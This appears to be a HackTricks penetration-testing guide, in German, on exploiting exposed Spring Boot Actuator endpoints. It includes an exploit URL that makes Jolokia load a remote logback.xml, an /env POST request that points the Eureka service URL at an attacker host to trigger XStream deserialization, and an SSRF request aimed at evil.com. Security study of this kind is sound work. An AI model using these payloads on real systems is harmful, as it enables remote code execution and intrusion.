hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

# Spring Actuators

<details>

<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Andere Möglichkeiten, HackTricks zu unterstützen:

* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.

</details>

## **Spring Auth Bypass**

<figure><img src="../../.gitbook/assets/image (5) (2).png" alt=""><figcaption></figcaption></figure>

**Von** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*

## Ausnutzen von Spring Boot Actuators

**Überprüfen Sie den Originalbeitrag von** [**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]

### **Hauptpunkte:**

- Spring Boot Actuators registrieren Endpunkte wie `/health`, `/trace`, `/beans`, `/env` usw. In den Versionen 1 bis 1.4 sind diese Endpunkte ohne Authentifizierung zugänglich. Ab Version 1.5 sind nur `/health` und `/info` standardmäßig nicht sensitiv, aber Entwickler deaktivieren diese Sicherheit oft.
- Bestimmte Actuator-Endpunkte können sensible Daten offenlegen oder schädliche Aktionen ermöglichen:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart` und `/heapdump`.
- In Spring Boot 1.x sind die Aktuatoren unter der Root-URL registriert, während sie in 2.x unter dem Basispfad `/actuator/` liegen.

### **Ausnutzungstechniken:**

1. **Remote Code Execution über '/jolokia'**:
- Der Aktuator-Endpunkt `/jolokia` gibt die Jolokia-Bibliothek frei, die den HTTP-Zugriff auf MBeans ermöglicht.
- Die Aktion `reloadByURL` kann ausgenutzt werden, um Logging-Konfigurationen von einer externen URL neu zu laden, was zu blindem XXE oder Remote Code Execution über speziell erstellte XML-Konfigurationen führen kann.
- Beispiel-Exploit-URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.

2. **Konfigurationsänderung über '/env'**:
- Wenn Spring Cloud Libraries vorhanden sind, ermöglicht der Endpunkt `/env` die Änderung von Umgebungseigenschaften.
- Eigenschaften können manipuliert werden, um Schwachstellen auszunutzen, wie z.B. die XStream-Deserialisierungsschwachstelle in der Eureka serviceURL.
- Beispiel-Exploit-POST-Anfrage:

```
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```

3. **Weitere nützliche Einstellungen**:
- Eigenschaften wie `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url` und `spring.datasource.tomcat.max-active` können für verschiedene Exploits manipuliert werden, wie z.B. SQL-Injection oder Änderung von Datenbankverbindungszeichenketten.

### **Zusätzliche Informationen:**

- Eine umfassende Liste der Standard-Aktuatoren finden Sie [hier](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- Der Endpunkt `/env` in Spring Boot 2.x verwendet JSON-Format für die Änderung von Eigenschaften, aber das allgemeine Konzept bleibt gleich.

### **Verwandte Themen:**

1. **Env + H2 RCE**:
- Details zur Ausnutzung der Kombination aus dem Endpunkt `/env` und der H2-Datenbank finden Sie [hier](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).

2. **SSRF auf Spring Boot durch falsche Interpretation des Pfadnamens**:
- Die Handhabung von Matrixparametern (`;`) in HTTP-Pfadnamen durch das Spring-Framework kann für Server-seitige Anfragenfälschung (SSRF) ausgenutzt werden.
- Beispiel-Exploit-Anfrage:

```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```


<details>

<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Andere Möglichkeiten, HackTricks zu unterstützen:

* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.

</details>